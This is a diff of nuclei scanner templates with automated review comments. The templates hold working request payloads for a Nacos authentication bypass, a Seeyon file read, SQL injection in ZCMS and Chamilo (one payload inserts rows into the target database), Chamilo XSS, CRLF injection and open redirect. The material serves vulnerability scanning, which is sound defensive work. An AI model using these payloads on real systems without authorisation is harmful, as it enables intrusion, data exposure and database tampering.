diff --git a/README.md b/README.md
index f76869b040..b838ee2abc 100644
--- a/README.md
+++ b/README.md
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates | Counts | Templates | Counts | Templates | Counts |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 297 | vulnerabilities | 139 | exposed-panels | 122 |
-| takeovers | 67 | exposures | 88 | technologies | 64 |
+| cves | 297 | vulnerabilities | 142 | exposed-panels | 122 |
+| takeovers | 67 | exposures | 89 | technologies | 64 |
 | misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
 | default-logins | 24 | exposed-tokens | 0 | dns | 8 |
 | fuzzing | 8 | helpers | 8 | iot | 11 |
-**102 directories, 1021 files**.
+**102 directories, 1031 files**.
diff --git a/cves/2020/CVE-2020-36287.yaml b/cves/2020/CVE-2020-36287.yaml
deleted file mode 100644
index 00c017c02a..0000000000
--- a/cves/2020/CVE-2020-36287.yaml
+++ /dev/null
@@ -1,36 +0,0 @@ -id: CVE-2020-36287 - -info: - name: Jira Dashboard Gadgets / Information Disclosure - author: Jafar_Abo_Nada - severity: medium - description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. - tags: cve,cve2020,jira,atlassian,disclosure - reference: | - - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 - - # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs - -requests: - - raw: - - | - GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - | - GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - "contains(body_1, '')" - - "status_code_2 != 401" - condition: and \ No newline at end of file diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml new file mode 100644 index 0000000000..81a6d3fc5d --- /dev/null +++ b/cves/2021/CVE-2021-29442.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2021-29442 + +info: + name: Nacos prior to 1.4.1 Missing Authentication Check + description: | + In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. + While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. + These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) + author: dwisiswant0 + severity: high + reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + tags: nacos,auth-bypass,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + - type: regex + regex: + - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\"" + part: body diff --git a/exposures/backups/exposed-mysql-initial.yaml b/exposures/backups/exposed-mysql-initial.yaml new file mode 100644 index 0000000000..f644e79c49 --- /dev/null +++ b/exposures/backups/exposed-mysql-initial.yaml 
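Review bot: `reference:` in the new CVE-2021-29442 info block is a single scalar carrying only the GHSL advisory, whereas the template deleted in this same commit (CVE-2020-36287) listed two sources including the NVD entry, which is the first thing a reader of a CVE template looks for. Suggest `reference:` followed by `- https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/` and `- https://nvd.nist.gov/vuln/detail/CVE-2021-29442`. The `TABLENAME` regex reads like generated trie output; a plain alternation of the same Derby/Nacos table names should match the same set and would be far easier to review when the schema list changes.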
@@ -0,0 +1,24 @@ +id: exposed-mysql-initial + +info: + name: Exposed mysql.initial + author: ELSFA7110 + severity: info + reference: https://hackerone.com/reports/1081817 + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/mysql.initial.sql" + + matchers-condition: and + matchers: + - type: word + words: + - "Roundcube Webmail initial database structure" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/misconfiguration/sonarqube-public-projects.yaml b/misconfiguration/sonarqube-public-projects.yaml index 92a5dc1060..8fbf957e16 100644 --- a/misconfiguration/sonarqube-public-projects.yaml +++ b/misconfiguration/sonarqube-public-projects.yaml @@ -21,8 +21,8 @@ requests: - type: word words: - - 'results' - - 'items' - - 'more' + - '"results":' + - '"items":' + - '"more":' part: body condition: and \ No newline at end of file diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml index 232a7ddcd7..a10ce723fc 100644 --- a/misconfiguration/springboot/springboot-env.yaml +++ b/misconfiguration/springboot/springboot-env.yaml @@ -16,11 +16,9 @@ requests: - type: word part: body words: - - "JAVA_HOME" - - "sping.config.location" - - "spring.application.name" + - "applicationConfig" - "local.server.port" - condition: or + condition: and - type: status status: - 200 diff --git a/misconfiguration/springboot/springboot-httptrace.yaml b/misconfiguration/springboot/springboot-httptrace.yaml new file mode 100644 index 0000000000..bd6d211c5d --- /dev/null +++ b/misconfiguration/springboot/springboot-httptrace.yaml 
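Review bot: The info block of exposed-mysql-initial never says what the matched file is, even though its only word matcher is Roundcube-specific (`Roundcube Webmail initial database structure`), and `tags: config,exposure` carries neither `backup` (the directory it lives in) nor `roundcube`. Suggest `name: Exposed Roundcube mysql.initial.sql`, a one-line `description:` stating that the template looks for a web-reachable copy of Roundcube's initial schema script, and `tags: config,exposure,backup,roundcube`. The file also ends without a trailing newline (`\ No newline at end of file`), as do several other new files in this commit.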
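Review bot: The tightened words `'"results":'`, `'"items":'` and `'"more":'` in sonarqube-public-projects now bind to compact JSON formatting as well as to the key names, so a pretty-printed body with `"results" :` would stop matching even though the key is present. If that trade-off is intended it is fine; otherwise a `type: regex` matcher such as `"results"\s*:` keeps the key-level precision without depending on whitespace. The request that produces this body starts outside the hunk.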
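Review bot: In springboot-env the body matcher now requires both `applicationConfig` and `local.server.port` (`condition: and`), but `applicationConfig` is, as far as I recall, the name of the property source backed by application.properties/yml, so an exposed `/env` on an app configured purely through environment variables or command-line properties would no longer be reported. Consider `"systemEnvironment"` (present in the env output of both 1.x and 2.x) as an alternative to `applicationConfig`, or add a comment on the matcher recording that the narrower match is deliberate to cut false positives. The `path:` list for this request is outside the hunk.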
@@ -0,0 +1,34 @@ +id: springboot-httptrace + +info: + name: Detect Springboot httptrace + author: that_juan_ & dwisiswant0 & wdahlenb + severity: low + description: View recent HTTP requests and responses + +requests: + - method: GET + path: + - "{{BaseURL}}/actuator/httptrace" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"traces"' + - '"timestamp"' + - '"principal"' + - '"session"' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header diff --git a/misconfiguration/springboot/springboot-loggers.yaml b/misconfiguration/springboot/springboot-loggers.yaml index 87d02229a9..d1e73b434f 100644 --- a/misconfiguration/springboot/springboot-loggers.yaml +++ b/misconfiguration/springboot/springboot-loggers.yaml @@ -17,8 +17,8 @@ requests: part: body words: - '"loggers"' - - '"profiles":' - condition: or + - '"levels"' + condition: and - type: status status: diff --git a/misconfiguration/springboot/springboot-trace.yaml b/misconfiguration/springboot/springboot-trace.yaml index 39905444e1..170360f235 100644 --- a/misconfiguration/springboot/springboot-trace.yaml +++ b/misconfiguration/springboot/springboot-trace.yaml @@ -10,22 +10,21 @@ requests: - method: GET path: - "{{BaseURL}}/trace" - - "{{BaseURL}}/actuator/trace" - - "{{BaseURL}}/httptrace" - - "{{BaseURL}}/actuator/httptrace" matchers-condition: and matchers: - type: word part: body words: - - "traces" - - "response" - - "request" - - "principal" - condition: or + - '"timestamp"' + - '"info"' + - '"method"' + - '"path"' + condition: and + - type: status status: - 200 + - type: word words: - "application/json" diff --git a/network/java-rmi-detect.yaml b/network/java-rmi-detect.yaml new file mode 100644 index 0000000000..07437783bb --- /dev/null +++ b/network/java-rmi-detect.yaml 
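Review bot: The new springboot-httptrace info block has no `tags:` (every other new template in this commit has one) and no `reference:`, so it cannot be selected by tag the way its siblings can. Suggest `tags: springboot,exposure`. In the header matcher the third word `"application/vnd.spring-boot.actuator.v1+json"` is already covered by the substring `"application/vnd.spring-boot.actuator"` above it under `condition: or`, so it can be dropped.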
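Review bot: springboot-trace now probes only `{{BaseURL}}/trace`, and the dropped `/actuator/trace` path is not taken over by the new springboot-httptrace template either, so a 1.x app served under a `management.context-path` of `/actuator` would, if I read the split correctly, no longer be covered by any template. If the drop is deliberate, a comment above `path:` saying that 2.x `httptrace` lives in springboot-httptrace and that 1.x `trace` is expected at the root would stop the next reader from re-adding it. The enclosing request block starts before the hunk.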
@@ -0,0 +1,21 @@ +id: java-rmi-detect + +info: + name: Detect Java RMI Protocol + author: F1tz + severity: info + tags: network,rmi + +network: + - inputs: + - data: "{{hex_decode('4a524d4900024b')}}" + + host: + - "{{Hostname}}" + read-size: 1024 + + matchers: + - type: regex + part: raw + regex: + - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" \ No newline at end of file diff --git a/network/weblogic-iiop-detect.yaml b/network/weblogic-iiop-detect.yaml new file mode 100644 index 0000000000..a451249992 --- /dev/null +++ b/network/weblogic-iiop-detect.yaml @@ -0,0 +1,24 @@ +id: weblogic-iiop-detect + +info: + name: Detect Weblogic IIOP Protocol + author: F1tz + severity: info + description: Check IIOP protocol status. + tags: network,weblogic + +network: + - inputs: + - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" + + host: + - "{{Hostname}}" + read-size: 1024 + + matchers-condition: and + matchers: + - type: word + words: + - "GIOP" + - "weblogic" + condition: and \ No newline at end of file diff --git a/network/weblogic-t3-detect.yaml b/network/weblogic-t3-detect.yaml new file mode 100644 index 0000000000..3354242dac --- /dev/null +++ b/network/weblogic-t3-detect.yaml @@ -0,0 +1,20 @@ +id: weblogic-t3-detect + +info: + name: Detect Weblogic T3 Protocol + author: F1tz + severity: info + description: Check T3 protocol status. + tags: network,weblogic + +network: + - inputs: + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + + host: + - "{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" \ No newline at end of file diff --git a/takeovers/fastly-takeover.yaml b/takeovers/fastly-takeover.yaml index 8f55b5a407..8c08c7ad6a 100644 --- a/takeovers/fastly-takeover.yaml +++ b/takeovers/fastly-takeover.yaml 
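Review bot: The regex in java-rmi-detect hard-codes `\x00\x0e` between the `N` acknowledgement byte and the dotted address, and that two-byte value looks like the length prefix of the address string that follows; if so, only a 14-byte address can ever match and a server echoing `127.0.0.1` (9 bytes) is silently missed. A dotted IPv4 string is 7 to 15 bytes long, so `- "^N\\x00[\\x07-\\x0f](\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00"` keeps the structural check while accepting any length. A short comment above `regex:` naming the fields (ack byte, length-prefixed host, port) would make the pattern maintainable.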
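Review bot: weblogic-iiop-detect sets `matchers-condition: and` over a single matcher, which is a no-op and reads as if a second matcher were lost; drop the line unless another matcher is meant to follow. `description: Check IIOP protocol status.` adds nothing beyond the name; stating what the probe sends (a GIOP request whose hex payload spells out `NameService`) and what the `weblogic` word in the reply indicates would help whoever tunes this later.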
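Review bot: The T3 probe in weblogic-t3-detect carries a hard-coded `PU:t3://us-l-breens:7001`, a hostname unrelated to the target that looks like a leftover from wherever the handshake was captured; if template variables are expanded inside `data` the way `{{hex_decode(...)}}` is in the sibling templates, `PU:t3://{{Hostname}}` would be the honest value, otherwise a comment saying the field is ignored would do. The single word `"HELO"` is a loose check; if the reply is the usual `HELO:<version>` line, matching `"HELO:"` costs nothing and avoids unrelated banners. A `description:` beyond `Check T3 protocol status.` stating that this is the T3 handshake would also help.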
@@ -3,9 +3,9 @@ id: fastly-takeover
 info:
 name: fastly takeover detection
 author: pdcommunity
- severity: high
+ severity: info
 tags: takeover
- reference: https://github.com/EdOverflow/can-i-take-over-xyz
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22
 requests:
 - method: GET
diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml
index 57320bcf4d..4876a8a42c 100644
--- a/vulnerabilities/generic/crlf-injection.yaml
+++ b/vulnerabilities/generic/crlf-injection.yaml
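Review bot: The severity drop from `high` to `info` in fastly-takeover is not explained anywhere in the template itself; a reader sees only a link to an issue. Suggest a one-line `description:` recording the reason the referenced issue gives for treating this fingerprint as informational, so the rating still makes sense if the link goes stale.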
@@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=
%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection" matchers: - type: regex diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 74cb0945be..0565611a9c 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml 
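Review bot: The new `?Test=` probe is fine, but the long context line directly above it contains `&redirectUri&redirectUrl=`, so `redirectUri` is sent with no payload and is never actually exercised; since the commit edits this list, `&redirectUri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUrl=` fixes it in place. The `matchers` block that evaluates these requests begins after the hunk ends.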
@@ -45,5 +45,5 @@ requests:
 matchers:
 - type: regex
 regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
 part: header
diff --git a/vulnerabilities/other/WooYun-2015-148227.yaml b/vulnerabilities/other/WooYun-2015-148227.yaml
new file mode 100644
index 0000000000..f15f8d3432
--- /dev/null
+++ b/vulnerabilities/other/WooYun-2015-148227.yaml
@@ -0,0 +1,25 @@
+id: WooYun-2015-148227
+info:
+ name: Seeyon WooYun LFR
+ author: princechaddha
+ severity: high
+ reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
+ tags: seeyon,wooyun,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "NCInvokerServlet"
+ part: body
+ - type: word
+ part: header
+ words:
+ - "application/xml"
diff --git a/vulnerabilities/other/chamilo-lms-sqli.yaml b/vulnerabilities/other/chamilo-lms-sqli.yaml
new file mode 100644
index 0000000000..8a3b456b4d
--- /dev/null
+++ b/vulnerabilities/other/chamilo-lms-sqli.yaml
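Review bot: Replacing `(?:\s*?)$` with `.*$` in the open-redirect regex turns `example.com` into an unanchored prefix, so a `Location` of `https://example.com.internal/` or `https://example.comstatic` now counts as a redirect to the canary host. If the goal was to accept a path or query after the host, `example\.com(?:[/?#:\s].*)?$` does that while still requiring the host to end at `example.com`: `- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:[/?#:\s].*)?$'`. The character class before `example\.com` already admits `notexample.com`; that is pre-existing, but worth a look while this line is being touched.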
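Review bot: WooYun-2015-148227 has no `description:`, and the name says `LFR` while the tag says `lfi`; the request reads a file named by the `filename` parameter (`WEB-INF/web.xml` here), so a one-line description saying that would let the name and the `lfi` tag agree. `reference:` is a single scalar here while other templates on this page list theirs.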
@@ -0,0 +1,29 @@ +id: chamilo-lms-sqli +info: + author: undefl0w + name: Chamilo LMS SQL Injection + severity: high + description: Finds sql injection in Chamilo version 1.11.14 + tags: chamilo,sqli + +requests: + - raw: + - | + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=image&field_id=image&tag=image&from=image&search=image&options=["test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'{{randstr}}'); INSERT INTO extra_field_options(option_value) VALUES ('{{randstr}}'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '{{randstr}}', 16,0) ON DUPLICATE KEY UPDATE tag='{{randstr}}', field_id=16, count=0; -- "] + + - | + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=image&field_id=image&tag=image&from=image&search=image&options=["test') or 1=1 -- "] + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "{{randstr}}")' \ No newline at end of file diff --git a/vulnerabilities/other/chamilo-lms-xss.yaml b/vulnerabilities/other/chamilo-lms-xss.yaml index 97005117e1..3af835083c 100644 --- a/vulnerabilities/other/chamilo-lms-xss.yaml +++ b/vulnerabilities/other/chamilo-lms-xss.yaml 
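Review bot: chamilo-lms-sqli is not a read-only check: the first request's `options` payload runs four `INSERT` statements (into `extra_field_rel_tag`, `extra_field_values`, `extra_field_options` and `tag`, with `ON DUPLICATE KEY UPDATE`), so every positive run leaves rows carrying `{{randstr}}` in the target's database. Nothing in the info block says so; at minimum add a `description:` stating that the template writes to the database, mark it with a tag such as `intrusive` so operators can exclude it, and add a `reference:` for the advisory. The matcher relies on `{{randstr}}` evaluating to the same value in the first request and in the DSL; if that is guaranteed by the engine, a comment saying so would save the next reader from checking.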
@@ -10,15 +10,14 @@ info: requests: - method: GET path: - - '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' - - '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' + - '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"' matchers-condition: and matchers: - type: word part: body words: - - "onmouseover%3dxss(0x01CE61)" + - 'agenda_js.php?type=xss" onmouseover=alert(document.domain)' - type: status status: - 200 diff --git a/vulnerabilities/other/zcms-v3-sqli.yaml b/vulnerabilities/other/zcms-v3-sqli.yaml new file mode 100644 index 0000000000..3936c83257 --- /dev/null +++ b/vulnerabilities/other/zcms-v3-sqli.yaml @@ -0,0 +1,21 @@ +id: zcms-v3-sqli +info: + name: ZCMS SQL Injection + author: princechaddha + severity: high + reference: https://www.anquanke.com/post/id/183241 + tags: zcms,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 9484adff46..5215139461 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -63,7 +63,10 @@ requests: - type: word words: - 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)' + - "PHP Version" + - "Configuration Command" part: body + condition: and - type: word words: - 'text/html'
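Review bot: The new body word `agenda_js.php?type=xss" onmouseover=alert(document.domain)` in chamilo-lms-xss proves the string is reflected but not that it is rendered as HTML; with `matchers-condition: and` already in place, a header word matcher on `text/html` would stop a JSON or plain-text echo of the parameter from being reported as XSS. The `/chamilo/`-prefixed path variant is also gone; if that is intentional (the prefix belonging in `{{BaseURL}}`), a short comment above `path:` would stop someone re-adding it.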